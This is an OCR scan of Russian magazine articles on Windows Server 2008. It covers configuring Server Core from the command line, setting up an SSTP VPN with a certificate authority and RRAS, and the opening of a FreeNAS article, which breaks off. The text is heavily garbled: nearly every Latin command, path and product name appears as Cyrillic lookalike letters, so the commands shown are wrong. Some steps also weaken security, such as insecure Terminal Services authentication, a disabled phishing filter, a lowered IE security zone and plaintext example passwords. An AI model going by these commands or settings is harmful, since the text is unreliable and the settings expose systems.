зоигсе=зкакіс \ 

ас!сігезз=ЗкакісІР тазк=ЗиЪпекМазк 
дакеѵ'7ау=Бекаи1кСакеѵ'7ау 

Для примера зададим серверу ІР-адрес 192.168.1 . 2; адрес 
шлюза пусть будет 192 .168.1.1. Вводим: 

> пекзЪ. іпкегкасе ірѵ4 зек асісігезз пате=" 2" 
зоигсе=зкакіс \ 

асісІгезз = 192 .168.1.2 шазк=2 55 . 2 55 . 2 55 . 0 
дакеѵ/ау=192 .168.1.1 

Настройки для ІРѵбзадаются аналогично. Учитывая важность 
службы Б N5, особенно для работы в среде АБ, следует обяза- 
тельно указать и 0145-сервер: 

> пекзЪ. іпкегкасе ірѵ4 асЫ сіпззегѵег пате=2 \ 

аскІгезз = 192 . 168 . 1 . 158 іпсіех=1 

Повторяем этот шаг для других БЫ 5-серверов, увеличивая 
на единицу значение іпбех. Теперь проверяем его работу при 
помощи команды рі пд : 

> ріпд ѵтѵі.ти 

Команда «Ьозкпаше» после установки покажет произвольно 
сгенерированное имя, вроде ѴѴІМ-БА86КН6Р653. Естествен- 
но, оно нам не подходит, поэтому переименовываем: 

> пексіот гепатесотрикег Ѵ/Ш-РА8СКНБРС53 / 
БеШате : СОЕЕЗЕѴ 

Как видишь, при переименовании потребуется ввести старое 
имя, полученное при помощи «Ьозкпаше». Альтернативным 
вариантом будет использование ѴѴМІ: 

> ѵѵтіе сошрикегзузкеш ѵЛіеге пате= "ШЫ- 
РА8СКНБРС53 " \ 

гепаше паше= "МШЗЕѴ1 " 
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После этой операции потребуется перезагрузка: 

> зЪиДсісжп — г -Д О 

Теперь осталось присоединить компьютер к домену и добавить доменного 
пользователя влокальную группу администраторов: 

> пеДсіот зоіп СОКЕЗКѴ /сіотаіп : ТЕЗТБОМАШ /изегсі : ЗузАсітіп 
/раззчлгогсі: Р@зЗѵ\Югс1 

> пеО Іосаідгоир асітіпізОгаІіогз /асісі ТЕЗТБ0МАШ\ІІзег 

Опять перезагружаемся и приступаем к настройкам. 

НАСТРОЙКИ ОКРУЖЕНИЯ 

Некоторые настройки в Соге Зегѵег производятся путем запуска 
команды «сопігоі», в качестве аргумента которой следует передать 
файл с расширением .срі (Сопігоі Рапеі І_і Ьгагу]. Команда «сііг * . срі 
I тоге», введенная в каталоге ѴѴІп б о\л/5\5у5іет32, показала наличие 
всего двух таких файлов. 

Некоторые сервисы зависят отточности хода часов компьютера. Особенно 
чувствителен кэтому КегЬегов, используемый Ай. Для настройки даты и 
времени следует ввести команду: 

> сопОгоІ ОітесіаЦе . срі 

После чего увидишь знакомое окно. Теперь переходим к изменению регио- 
нальных установок: 

> сопОгоІ іпДІ.срІ 

Здесьчетыре вкладки, где можно установить формат времени, цифр итак 
далее, указать расположение, установить раскладку клавиатуры и сис- 
темную локаль. Чтобы добавить русскую раскладку, выбираем КеуЬоагбз 
апб І_апдиаде5 и, нажав кнопку СИапде кеубоагбз, выбираем в списке 
нужную. Обрати внимание на вкладку І_апдиаде Ваг. Здесь можно указать 
расположение индикатора переключения раскладки. Еще одна кнопка 
(«ІпзіаІІ/ІІпіпзіаІІ Еапдиадез») позволяетзагрузить файлы для локализа- 
ции меню и диалоговых окон. 

В каталоге 5уз1:епп32 находится полезный скрипт — зсгедебіі.ѵѵзб кото- 
рый позволяет настроить автоматическое обновление системы, Петоіе 
Оезкіор, ІРЗес, приоритеты 0Ы5. Все параметры запуска скрипта мож- 
но просмотреть, введя «сзсгірО зсгедесііц .мзі /?». Эту команду 
следует выполнять в каталоге 5уз1ет32, иначе придется указывать 



абсолютный путь. Например, чтобы просмотретьтекущие настройки 
автоматического обновления, используем: 

> сзсгірО зсгедесіііс . члгзі /АІІ /ѵ 
Ѵаіие поО зеС 

По умолчанию автоматическое обновление отключено. Использовав ключи 
«/аи /?», узнаем доступные параметры. Для активации автоматического 
обновления следует ввести: 

> сзсгірО зсгедесіііс .ѵ^зі /АІІ 4 
Отключить его также просто: 

> сзсгірО зсгедесііі: . мзі /АІІ 1 

Ксожалению, отсутствие ОІЛ и каких-либо файлов настроек означает, что 
обновление будет производиться по принципу «все или ничего». Указать 
на отдельный компонент нет никакой возможности. Вероятно, выходом из 
ситуации является обновление через ѴѴ51І5. 

Разрешить подключения по протоколу Ретоіе йезкіор Ргоіосоі (ПОР) для 
удаленного управления сервером нетрудно: 

> сзсгірО зсгедесіііі .ѵ^зі /АН. О 

Поумолчанию ѴѴІпбоѵѵз Рігеѵѵаіі (ѴѴР) активен и на всех интерфейсах 
блокирует входящие соединения. Поэтому нам нужно разрешить РОР-под- 
ключения. Для управления используем пеІвЬ с ключом ' асіѵіігемаіі ' 
(Абѵапсеб РігеѵѵаЩ: 

> пеДзЬ асіѵіігемаіі Рігеѵѵаіі асісі гиіе пате="ТЗ Асішіп" \ 

ргоДосо1=ТСР сііг=іп 1оса1рогД=33 89 асЦіоп=а11оѵ^ 

Используем небезопасные подключения терминального сервиса: 

> сзсгірО зсгедесіііс .мз! /СЗ О 

Если вместо 0 указать 1 , то для аутентификации будетзадействован безо- 
пасный протокол СгебЗЗР (СгебепІіаІЗесигіІу Зегѵісе Ргоѵібег), который 
кроме ѴѴІп2к8 поддерживают Ѵізіа и ѴѴІпХРЗРЗ. Поумолчанию скринсейвер 
включен и активируется через 10 минутбездействия. При первых настройках, 
когда часто смотришь в мануал, это мешает. Чтобы его отключить, следует 
запустить программу гедесіДЗ 2 (именно без і) иустановитьзначение ключа 
НКСІІ\СопЦгоІРапе1\Безк0ор\ЗсгеепЗаѵеАсЦіѵе в 0. 
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> зПагД /ѵг осзеПир БНСРЗегѵегСоге 

Для настройки параметров работы после его ус- 
тановки используем ММС на удаленной системе 
или локально, с помощью утилиты пеівб. 
Аналогичноустанавливаются другие роли и 
компоненты. Исключения составляют только 
две роли. Первую — Зіхеатіпд Месііа Зегѵісез 
— необходимо предварительно скачать с сайта 
Місговоіі ( 5иррогТтісго50Й.сот/кЬ/934518 . 
вариант для Соге) и затем установить тзи-файл: 

> зПагД /ѵі ѵгиза /диіеД 

Мпскллзб . 0-КВ934518-х86-8егѵегСоге . 
шзи 

После чего вывод осіізі покажет наличие новой 
роли. Ставим и запускаем: 

> зПагД /ѵ! осзеДир МесЗіаЗегѵег 

> пеД зПагД ѵтшзегѵег 



Редактируем реестр 

УПРАВЛЕНИЕ РОЛЯМИ И КОМПОНЕНТАМИ 

Мы выполнили базовую установку и настроили общие параметры сервера. 

В режиме Зегѵег Соге нет ролей и компонентов, установленных поумол- 
чанию. Поэтому об этом необходимо позаботиться самостоятельно. Для 
настройки каждой применяются свои команды (что неудобно). Крометого, 
нормальной документации для Зегѵег Соге пока недостаточно. 

Для просмотра списка доступных ролей и дополнительных компонентов, ис- 
пользуемых программой установки Осзеіир.ехе, набери следующую команду: 

> осіізД 

Начнем с критической для работы многих сервисов роли 0Ы5-сервера. Для 
установки ВВОДИМ: 

> зВагВ /ѵ? осзеВир БЫЗ-Зегѵег-Соге-КоІе 

Учти, что название роли и компонента чувствительно к регистру. 
Дополнительный ключ ‘/ѵѵ’ задерживает появление приглашения командной 
строки до тех пор, пока выполнение команды не завершится (пока установка не 
закончится). Чтобы удалить роль ил и компонент, просто добавь к команде ключ 
ѴипіпзіаІГ. Дальнейшая настройка ОЫЗ производится удаленно при помощи 
консоли ММС или команды «сіпзстсі», все параметры которой можноузнать, 
введя «сіпзстсі /іпію». Добавим ОЫЗ-зонус именем сіотаіп как ргі тагу зону: 



Для удаленного управления Месііа Зегѵісез реко- 
мендуется использовать ММС-консоль, которую 
можно скачать на этой же странице. 

И вторая роль — ОСРгото — за неимением графического интерфейса тре- 
бует наличия заранее подготовленного файла ответов. Формат файла будет 
отличаться, в зависимости оттого, создается новый домен или контроллер 
подключается куже имеющемуся. Узнать все параметры файла можно, 
запустив «бсргото» с ключом '/? '. Для создания нового домена создадим 
файл и паНепб.М такого содержания: 

[БСІпзДаІІ ] 

# Пароль админа, иначе пустой 
АсЗтіпізДгаДогРаззѵтогсІ = раззілгогсі 

# Первый домен 
КерІісаОгЫечлФотаіп = Ботаіп 
Ыеѵ\Щ>отаіп=РогезП 
ВошаіпЫеПВіозЫате = сіотаіп 

# Имя 

ИетлЮотаігПЖЗКате = сіотаіп . Іосаі 

АиСоСопбідВЫЗ=Уез 

Б№Бе1едаОіоп=Уез 

ВЫЗБе1едаЦіопизегИате=с1пзизег 

ВК8Бе1едаЦіопРаззѵлэгсі=РаззтлЮгсі 

# Перезагрузка вручную 
КеЬооВОпЗиссезз = N 0 

# Пароль для режима восстановления 
ЗаіеМосіеАсітіпРаззѵгогсі = РѲззчлОгсі 



> сіпзстсі /гопеасісі " сіотаіп. Іосаі" /Ргітагу \ 
/іііе "сіотаіп. Іосаі . сіпз " 



Теперь выполняем: 



Чтобы добавить запись А для узла сотрі с ІР-адресом 1 92.1 68.1 .5 к зоне 
сіотаіп. Іосаі, вводим: 

> сіпзстсі /гесогйаск! сіотаіп . Іосаі сотрі А 192 .168.1.5 

Использовав ключ '/гопергіпд', можно просмотреть списокзон, а для 
удаления записи вместо '/гесогйайсТ пишем '/гесогсМе^Пе'. Также 
следует разрешить автоматический за пуск для установленной роли: 

> зс сопіід сіпз зВагД= аиВо 

Для развертывания ОСНР-сервера набираем: 



> сісргото /ипаВВепсі: С : ХипаВВепсі. ВхД 

Теперь контроллер домена установлен. 

ВЫБОРЗА ТОБОЙ 

Режим ЗегѵегСоге, появившийся в ѴѴІп2к8, — новшество из разряда 
ожидаемых. Администраторы с небольшим опытом могут не принятьтакой 
режим, так как операции, которые раньше производились двумя щелчками 
мышки, теперьтребуют погружения в документацию. Приведение сервера 
в рабочее состояние может занять заметно больше времени. Но, с другой 
стороны, ты получишь более безопасную и стабильно работающую систему. 
Поэтому — взвесь все рго и сопіга и действуй, ц-ц 
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ПО РЕПЕ П IV «АМЕРИКАНСКОГО ПИРОГАнІ 
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ѴРЫ-решения появились в ОС ѴѴІпсІоѵѵз еще во времена ]МТ. В каждой пос- 
ледующей версии добавлялись новые возможности для построения вирту- 
альных частных сетей. Выход ѴѴіп2к8 также не стал исключением — теперь 
число поддерживаемых протоколов увеличилось аж до четырех: РРТР, Й2ТР, 
ІР$ес и 88ТР. Только последний из них действительно безопасен. 



Н0ВИНКА55ТР 

Принцип работы 55ТР (Зесиге Зоскеі: Типпеііпд Ргтйосоі — протокол 
безопасного туннелирования сокетов) напоминает способ примене- 
ния 55 Ьвобычном браузере. ѴРЫ- клиент подключается к серверу 
55ТР на стандартный НТТР5-порт 443/іср и отправляет ему приветс- 
твенное сообщение, уведомляя, что хочет создать 55І_-сеанс. Сервер 
высылает сертификат. Клиент проверяет базу Тгивіюсі Рооі СегШісаііоп 
АиіЬогйіев, чтобы убедиться в валидности полученного сертификата, 
и передает на сервер специальным об разом зашифрованную форму 
ключа 55 1-сеанса. Тот ее расшифровывает с помощью лично го ключа 



сертификатов. Теперь соединение шифруется оговоренным методом 
шифрования и ключом 551-сеанса. Это существенно снижает веро- 
ятность перехвата данных. Далее идет окончательное согласование 
параметров 55ТР-канала и РРР-соединения, происходит проверка 
мандата пользователя посредством механизмов аутентификации 
РРР/ЕАР и конфигурирование настроек для ІРѵ4/ІРѵ6 трафика. Только 
затем клиент получает доступ к ресурсам удаленной сети. 

55ТР позволяет значительно упростить организацию соединений, так 
какпритакомтипеѴРЫ-подключении не требуется перестройка правил 
межсетевого экрана, и нет проблем с ЫАТ-устройствами или при работе 
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через прокси-сервер. Правда, если промежуточный прокси имеет функции 
проверки подлинности, то с настройками придется немного повозиться. 
Клиентские ОС Ѵізіа 5Р1 и ѴѴІпХРБРЗуже поддерживают этот протокол. 
Естественно, и ѴѴІп2к8 можно настроить в качестве клиента. 



ЧТО НУЖНО ДЛЯ ѴРЫ? 

Типичная инфраструктура для создания ѴРЫ в ѴѴІп2к8 состоит из 
контроллера домена, сервера сертификатов, серверов РГСА5 (Ноиііпд 
апсі Петоіе Ассезз) и ЫРБ (Ыеіѵѵогк Роіісу Бегѵег). Последний ранее 
назывался Іпіегпеі АиіЬепІісаІіоп Бегѵег (ІА5), а фактически был 
РАО 1115-сервером. Размещение этих компонентов зависит от топо- 
логии сети и количества пользователей. Кроме контроллера АО, все 
остальные вполне могут работать на одном компьютере. Размещать 
контроллер домена и ППА5-сервер на одной машине не следует. 
Адреса ѴРЫ можно раздавать клиентам при помощи ОНСР-сервера 
или средствами РРА5. Для аутентификации задействуй внешний 
РАОІЛЗ-сервер. 

Для простоты будем считать, что у нас уже есть настроенный контрол- 
лер домена и служба йЫБ, созданы учетные записи и общие каталоги, 
которые будут использованы для удаленного доступа. Сервер РРА5, 
участвующий в настройке ѴРІ\І, подсоединен к домену и виден из 
внешней сети через межсетевой экран. 

В ѴѴі п 2 кЗ у пользователей, которым разрешен доступ к ѴР N , должен 
быть активирован пункт «Управление на основе пол ити к удаленного 
доступа» вменю «Входящие звонки» (Оіаі-іп). В ѴѴі п 2 к8 есть анало- 
гичная вкладка в свойствах учетной записи. Чтобы разрешить поль- 
зователю подключаться удаленно, установи флажок в пункте «АІІоѵѵ 
Асееве» или «Сопігоі Ассезз ТЬгоидЬ ЫРБ Ыеіѵѵогк Роіісу». 

Для выдачи сертификатов используется Асііѵе Оігесіогу Сегіііісаіе 
Бегѵісев, который, в свою очередь, потребует наличия роли ѴѴеЬ 
Бегѵег (N5). Хотя сам N5 не принимает участия в работе РРА5, так как 
Н НРБ -соединения проходят прямиком через драйвер НТТР . ЗУ 8 , он 
нужен исключительно для получения сертификата. 



СЕРВЕР СЕРТИФИКАТОВ: НАСТРОЙКА 

Итак, с теоретической частью и геометрией домена закончили, обра- 
тимся к настройкам. Выбираем в Іпіііаі Сопіідигаііоп Тавкв (команда 
оо Ье) или в Бегѵег Мападег ссылку Аб б гоіее и отмечаем пункт Асііѵе 
Оігесіогу Сегіііісаіе Бегѵісев. Переходим к следующему шагу, в котором 
нам предлагают выбрать службу ролей (Поіе Бегѵісев). Щелкаем по 
Сегіііісаііоп АиіЬогіІу ѴѴеЬ Епгоіітепі. Появившийся мастерАбб Роіев 
ѴѴІгагб позволит дополнительно установить еще две роли: ѴѴеЬ Бегѵісев 
(1 15) и ѴѴІпбоѵѵв Ргосевв Асііѵаііоп Бегѵісев. Соглашаемся, нажав Абб 
Педиігеб Роіе Бегѵісев, и попадаем в диалог, где будет предложено 
выбратьтип установки СА (Сегіііісаііоп Аиіогіііез). Пожалуй, доста- 
точно остановиться на Біапбаіопе. В окне САТуре следуетустановить 
переключатель в Нооі СА. 

Переходим кэтапу работы с приватными ключами. Если планируется 
использовать ранее созданный секретный ключ, отмечаем «Ызе ехізііпд 
ргіѵаіе кеу». Иначе — создаем новый ключ, выбрав «Сгеаіе а пеѵѵ ргіѵаіе 
кеу». В настройках безопасности ключа по умолчанию используется алго- 
ритм 5НА1 с длиной ключа 2048 бит. В большинстве случаев этого хватит. 
Если тебя эти настройки не устраивают, выбери в СгурІодгарЬу другие 
варианты. На этапе Сопіідиге СА Ыате для ключа будет предложено имя, 
полученное командой Ьозіпате. Учти, что имя в сертификате должно 
совпадать с ОЫ 5- именем ѴРЫ -сервера, поэтому при необходимости про- 
пиши нужное в «Сот топ пате бог іЫв СА». По дефолту сгенерирован- 
ный ключ будет действителен втечение пяти лет (срок можно изменить 
на этапе Ѵаіісіііу Регіоб). Создание ключей, не имеющих срока окончания 
действия, не предусмотрено, но это легко обойти, указав большой период 
валидности ключа. Сгенерированные ключи будут помещены в каталог 
Шіпсіснѵз / зу зСешЗ 2 /СегСЬод. 

Мастер перейдет кустановке 115; здесь на втором шаге будет предложено 
выбрать службы ролей. На странице выбора уже отмечены некоторые из 
них, оставляем, какесть. 




СОЗДАЕМ СЕРТИФИКАТ 

Итак, ключи готовы. Теперь ѴРЫ-серверу необходимо получить сертификат, 
который будет использован при создании ѴРЫ-соединения с компьютером 
клиента. 

Чтобы нам не помешала система безопасности, уменышимуровеньзащиты 
или установим в Тгизіесі-зону сайт, с которого будет приниматься серти- 
фикат. Для этого запусти ІЕ с правами администратора (если работаешь 
подобычнойучетнойзаписьюдо выбери в контекстном меню Рипаз 
асітіпізігаіог). Выбрав Тооів Іпіегпеі Орііопз, вызываем окно настроек. 
Переходим во вкладку Абѵапсеб и отключаем фишинг-фильтр, установив 
флажокТигп оііаиіотаііс РЬізЬіпд Еіііег. Дальше заходим на вкладку 
Бесигііу, отмечаем Ьосаі іпігапеі, где изменяем уровень безопасности с 
МеЬіит-Іоѵѵ на Ьоѵѵ. 

В браузере набираем адрес Сегіііісаііоп АиіЬогіІу ѴѴеЬ Епгоіітепі, в общем 
случае — это ЫірУ/ІосаІЬозі/сегІзгѵ . Нажимаем ссылку Пециезі а сегіііісаіе, 
затем в следующем окне АсІѵапсесІ Сегіііісаіе Редиезі жмем Сгеаіеапсі 
зиЬтіІ а гециезі Іо іЬіз СА. Разрешаем запуск АсІіѵеХ-объектов и приступа- 
ем кзаполнению полей, самым важным из которых является Ыате. Здесь 
указывается имя, которое ѴРЫ-клиенты будут использовать при подклю- 
чении ксерверу. В раскрывающемся списке Туре оі Сегіііісаіе МеесІесІ 
выбираем Бегѵег АиіЬепІісаІіоп Сегіііісаіе. В поле Кеу Орііопв и АсИІІІопаІ 
настраиваем параметры ключа. И обязательноустанавливаем флажок Магк 
кеузазехрогІаЫе. Поокончанииустановокнажимаем БиЬтіІ. Появится 
запрос на установку нового сертификата. Подтверждаем нажатием Уев 
и запоминаем Редиезі Ю. В окне, открывшемся по окончании создания 
сертификата, нам предложат установить полученный сертификат. 

Для установки сертификата открываем ММС-консоль (Біагі -> Рип, на- 
бираем ттс). В меню Еііе выбираем пункт АсИ/Ретоѵе Бпар-іп. Должно 
появиться окно добавления и удаления оснастки, в котором отмечаем 
Сегіііісаііоп АиіЬогіІу и нажимаем кнопку АсІЬ для переноса его в правый 
столбик. Нам предложат выбрать компьютер, к которому будет подклю- 
чаться выбранная оснастка. Оставляем значение поумолчанию (Ьосаі 
сотриіег). После нажатия на ОКв ММС-консоли появится вкладка 
Сегіііісаііоп АиіЬогіІу (Ьосаі), в списке которой находится наш сервер. Рас- 
крываем список и переходим в пункт Репсііпд Редиевів. Здесь должен быть 
наш сертификате номером в столбце Редиезі Ю (совпадаетссозданным 
на предыдущем шаге). Отмечаем его и в контекстном меню переходим в 
пун кт АН Тавкв Іззие. Сертификатбез всякого предупреждения исчезнет 
из этого списка и обнаружится только во вкладке ІвзиесІ Сегіііісаіез. Чтобы 
просмотреть его свойства, достаточно дважды щелкнуть мышкой. Обрати 
внимание на параметр СРЬ И івігі Ьиііоп Роіпіз (Точки распределения СРЬ): 
в нем показана ссылка, выбрав которую, клиент может за грузить список 
отозванных сертификатов (Сегіііісаіе Реѵосаііоп І_ізІ — СРЬ), чтобы убе- 
диться, что сертификат ѴРЫ сервера не был отозван или поврежден. 
Переходим кустановке сертификата. Для этого открываем страницу ЫірУ/ 
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• 55І_ (Зесиге Зоскеіз 
Ьауег) — уровень 
защищенных сокетов. 
Криптографический 
протокол, обеспечи- 
вающий безопасную 
передачу данных 

в Сети. 

• 55ТР часто называют 
«РРР через 551». 

Это означает, что 
можно использовать 
механизмы аутенти- 
фикации РРР и ЕАР, 
чтобы сделать 55ТР- 
соединение более 
безопасным. 

• Упрощение настроек 
и решение проблем 

с файрволами и ЫАТ- 
устройствами — вот 
основные задачи, ко- 
торые наряду с повы- 
шением безопасности 
ставили перед собой 
разработчики 55ТР. 

• По сравнению с 
ІРвес 55ТР обеспечи- 
вает более сильную 
аутентификацию. 

• Ѵізіа 5Р1 иѴѴІпХР 
5РЗ поддерживают 
протокол 55ТР. 

• Ссылка в параметре 
СПС 0 ізігі Ьиііоп Роіпіз 
в свойствах ключа даст 
II ПЦ по которому мож- 
но получить список 
отозванных сертифи- 
катов и убедиться, что 
сертификатѴРЫ сер- 
вера не был отозван 
или поврежден. 




[осаІНозІ/сегізгѵ . где выбираем Ѵіеѵѵ Еле зіаішзоі а репбіпд 
сегШісаІе гециевС В окне появится списокссылок на сертифи- 
каты (он у нас один). Нажимаем на ссылку и попадаем в окно 
СеНІЕсаіе ІззиесІ, попутно разрешая выполнение сценариев 
АсііѵеХ. Для установки нажимаем ІпзіаІІіЫз сегіібсаіе и подт- 
верждаем установку. 

Теперь нужноуказать, для кого мы его, собственно, созда- 
вали. Снова вызываем ММС, находим и добавляем вкладку 
СегШісаІез, какпоказано выше. Нажимаем РіпізЬ, чтобы при- 
нять предлагаемое по умолчан ию значение Му изегассоипС 
Затем повторяем действие, нотеперь выбираем Сотриіег 
ассоипС В диалоговом окне 5еІесі Сотриіег оставляем пред- 
ложенное значение Соса I сотрите г. Закрываем окно АсИ ог 
Петоѵе 5пар-іпз. 

В панели ММС переходим в СегЕЕсаіез Сиггепі СІзег -> 
РегзопаС Выбираем сертификат и нажатием в контекстном 
меню АИТазкз -> Ехрогі вызываем мастер СегШісаІе Ітрогі 
ѴѴІгагб. Первое окно пропускаем; во втором устанавливаем 
переключатель в Уез, ехрогі; Еле ргіѵаіе кеу. Далее мастер 
советует выбрать формат файла сертификата; оставляем 
предложенный по умолчанию — РКС5 #12. После чего 
вводим два раза пароль для защиты приватного ключа и 
указываем, куда сохранить файл. Затем просто следуем за 
мастером, соглашаясь со всеми пунктами. Теперь импорти- 
руем ключ на компьютер. Для этого выбираем СегШісаІез 
( Соса I Сотриіег) -> Регзопаі и в контекстном меню, доступ- 
ном по щелчку на пункте СегЕЕсаІюз, выбираем АС Тазкз 
ІтрогС В появившемся мастере нужно лишь указать на 
файл, сохраненный на предыдущем шаге. Если егозначок 
не будет показан, поставь в раскрывающемся списке справа 
внизу АС Еііез. Для импорта понадобится ввести пароль 
и место хранения (здесь просто переходим к следующему 
шагу, оставив значение Регзопаі). 

Все, сертификатный квест полностью пройден. Теперь можно 
спокойно переходить кустановке и настройке роли РРА5. 

УСТАНОВКА И НАСТРОЙКА КРАБ 

Выбираем в 5егѵег Мападег пункт АсІЕ гоіез, отмечаем пункт 
ЫеЕ/ѵогк Роіісуапб Ассезз Зегѵісез и в окне выбора службы ро- 
лей — РоиЕпд апЕ Ретоіе Ассезз Зегѵісез. В результате будут 
выбраны пункты Ретоіе Ассезз Зегѵісе и РоиЕпд. Нажимаем 
Іпзіаіі, подтверждаем выбранные элементы и ждем окончания 
процесса установки. 

Теперь нужно активировать сервисы. Это можно сделать, 
вызвав из меню 5і:агі Асітіпізіігаііѵе Тооіз консоль 
РоиЕпд а пЕ Ретоіе Ассезз (или выбрав аналогичный 
пункт в появившемся после установки роли меню в 



5егѵег Мападег). Находим в контекстном меню пункт 
СопЕдиге апЕ ЕпаЫе РоиЕпд апЕ Ретоіе Ассезз. На 
втором шаге мастера (первый пропускаем) нам предла- 
гают активировать несколько вариантов сервисов. По 
умолчанию предлагается пункт Ретоіе ассезз (Еіаі-ир 
ог ѴРЫ), при помощи которого настраивается удаленный 
доступ для пользователей диалап или ѴРЫ — его же ре- 
комендует и документация МісгозоН. Подходит он не для 
всех ситуаций, поэтому советую внимательно изучить, 
что предлагается в остальных пунктах. Они отвечают за 
активацию сервиса ЫАТ, связки ѴРЫ + ЫАТ, соединение 
между двумя сетями и выборочную настройку. В том 
случае, когда внешние клиенты должны получать доступ 
к серверу сертификации, потребуется и ЫАТ, иначе 55ТР- 
соединение работать не будет. Поэтому выбираем ѴИиаІ 
Ргіѵаіе Ыеіѵѵогк (ѴРЫ) ассезз апсі ЫАТ. На следующем 
шаге отмечаем интерфейс, к которому будут подклю- 
чаться ѴРКІ- клиенты (если на сервере установлена одна 
сетевая карта, будет выведено предупреждение). Далее 
мастер предлагает определиться с тем, как назначать ІР- 
адреса клиентам: автоматически или вручную. Вариант 
АиіотаЕсаІІу подходит, когда имеется ОСНР-сервер. 
Иначе указываем Ргот а зресіЕеЕ гапдеоі аЕЕгеззез 
— ив следующем окне вводим диапазон ІР-адресов.Так 
как аутентификацию пользователей будем производить 
средствами РРА5, то в следующем окне оставляем зна- 
чение поумолчанию (N 0 , изе РоиЕпд апЕ Регионе Ассезз 
5егѵег ...). Хотя если уже есть настроенный РА0Ш5-сер- 
вер, лучше использовать именно его. 

В сообщении после активации сервисов будетсказано, что 
выбранный режим распределения ІР-адресов потребует на- 
личия агента распределения ОСНР РеІауАдепС Ничего делать 
не нужно, просто принимаем это к сведению. 

Если сейчас посмотрим на вкладку РРА5, то увидим, что 
появились дополнительные вкладки, где можно настроить 
маршрутизацию, работу Реіау АдепЕа и прочее (отдельно 
для ІРѵ4 и ІРѵб). Некоторые настройки доступны и в меню 
свойств роли РРА5; назначение большей части из них 
понятно и без пояснения. Советую просто пройтись по 
пунктам, чтобы разобраться с возможностями. Настройки 
портов для всех типов ѴРЫ производятся в меню свойств 
вкладки РогС 

Кстати, чтобы сервер 55ТР вместо НТТР5 использовал 
НТТР-соединение (порт80Аср), значение параметра 
ІІзеНЕрз, который находится в ветке НКЬМ\Зуз0ет\ 
СиггепЦСопЦго18еЦ\8егѵісез\8з0р8ѵс\РагатеЦегз, 
нужно с 1 изменить на 0. Это может понадобиться при работе 
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свойства ключа 



Разрешаем пользователю подключаться через ѴРЫ 



через ЗЗЬ-терминатор или реверсный прокси. Чтобы разрешить НТТР-за- 
просы на сервер сертификации, выбираем I Рѵ4 — ЫАТ и в контекстном меню, 
появляющемся по щелчку мышки на внешнем сетевом интерфейсе, указываем 
его свойства. Теперь переходим в окно Зегѵісезапб Рогіз и устанавливаем 
флажокв пункте ѴѴеЬ5егѵег(НТТР). Вдиалоге ЕсІііЗегѵісе вводим ІР-адрес 
сервера сертификации внутренней сети. 

ВСЕ ГОТОВО КПЕРВОМУ ПОДКЛЮЧЕНИЮ 

Настройка ѴРЫ-соединения в Ѵізіа и ѴѴіпХР довольно проста, поэтому 
покажу, какэто сделать в ѴѴІп2к8 (пользователи Ѵізіа найдут много общего). 
Документация Місгозоіі советует вначале настроить РРТР-соединение, и 
если все в порядке, переходить на 62ТР или 55ТР. 

Для настройки РРТР ѴРЫ вызываем Ыеіѵѵогк ап б ЗЬагіпд Зегѵег. Проще 
это сделать из контекстного меню, вызываемого по щелчку на индикато- 
ре сетевой активности. Нажимаем ссылку 5еі ир а соппесііоп о г пеіѵѵогк 
и в появившемся окне нажимаем С Иск Соппесі іо а ѵѵогкріасе, затем в 
следующем окне жмем ІІзе ту Іпіегпеі соппесііоп (ѴРЫ). Мастер пред- 
ложит настроить интернет-соединение. Здесь можно отметить ГІІзеі ир 
ап Іпіегпеі соппесііоп Іаіег. Вводим ОЫЗ-имя ѴРЫ-сервера и в строке 
ниже — описание соединения. Переходим к следующему диалогу, где 
вводим логин и пароль пользователя. Эти данные будут использоваться 
при подключении. Чтобы соединиться с ѴРЫ-сервером, в ІЧеіѵѵогкапсІ 
ЗИагіпд Сепіей выбираем Соппесі іо а пеіѵѵогк, а в появившемся окне 
нажимаем ѴРЫ Соппесііоп. Если все нормально, значит можно перехо- 
дить к настройке 55ТР. 

ѴРЫ-клиент, использующий 55ТР-подкл ючение, должен устано- 
вить сертификат сервера. При использовании контроллера домена 
это будет сделано автоматически (или же придется установить его 
вручную). Весь процесс во многом напоминает установку сертифи- 
ката на сервер, о которой говорилось выше: получаем сертификат 
с Сегіііісаііоп АиіЬогііу ѴѴеЬ Епгоіітепі и импортируем при помощи 



М МС Сегіііісаіе (босаі Сотриіег). Теперь вызываем свойства создан- 
ного ѴРКІ-соединения. Во вкладке N еіѵѵо гкі п д , в раскрывающемся 
списке Туре оі ѴРІ\І, установленный по умолчанию Аиіотаііс меняем 
на 55ТР. Вот и все! 



ЗАКЛЮЧЕНИЕ 

Несмотря на то, что настройка ѴРЫ в\А/іп2к8 на первый взгляд кажется 
немного запутанной, на самом деле все понятно и логично. Создать готовую 
конфигурацию можноза полчаса. Появление нового протокола, работаю- 
щего по стандартным портам, снимает все вопросы по работе через файр- 
вол и ІЧАТ. Несомненно, это упростит жизнь ал министрато ру. т 



Установка 55ТР ѴРЫ на клиентском компьютере 





> ѵѵагпіпд 

55ТР не предназначен 
для организации меж- 
сайтовых виртуальных 
частных сетей. 
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РКЕЕЫА5: ДИСТРИБУТИВ ДЛЯ СОЗДАНИЯ СЕТЕВОГО ХРАНИЛИЩА ДАННЫХ 



Даже в сети небольшой организации, не имеющей централизованного уп- 
равления, данные удобно хранить на отдельном сервере. Это позволяет тон- 
ко разграничить доступ и упростить резервное копирование, а также 
на порядок упрощает администрирование. 



НЕДОСТАТКИ ВЫТЕКАЮТ ИЗ ДОСТОИНСТВ 

МАБ (Ыеіѵѵогк АНасЬесІ Біогаде] представляет собой один или несколько 
специализированных выделенных устройств, имеющих свой ІР-адрес и 
обеспечивающих доступ пользователей на уровне данных напрямую либо 
через сервер-посредник. Учитывая, что устройства МАБ выполняют строго 
определенные функции и при их реализации используются, как правило, 



специальные версии популярных операционных систем, в качестве серве- 
ров можно задействовать маломощные системы с небольшим количеством 
ОЗУ и, соответственно, меньшей стоимостью. Подключение подобных 
устройств прозрачно для сети. Они сами определяютсвои сетевые адреса и 
объявляются как накопители информации. Решения на базе МАБ оптималь- 
ны для небольших организаций либо отдельных подразделений, так как 
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позволяют создатьсетьхранения информации любой емкости 
без больших затрат. 

Все недостатки ЫА5 вытекают из перечисленных достоинств. 
Например, необходимо побеспокоиться озащите информа- 
ции от несанкционированного доступа со стороны других 
пользователей. Поэтомутакие системы широко используют 
различные методы аутентификации: 1_0АР, N15, Пасііиз, Асбѵе 
Оігесіогу и прочие. Но все-таки самым главным недостатком 
ЫА5 для многих будет существенное увеличение нагрузки на 
сеть. Стоиточеньтщательно планировать расположение и 
количество МА5-устройств. Если какой-то из отделов органи- 
зации работаете файлами большого объема, лучше перевести 
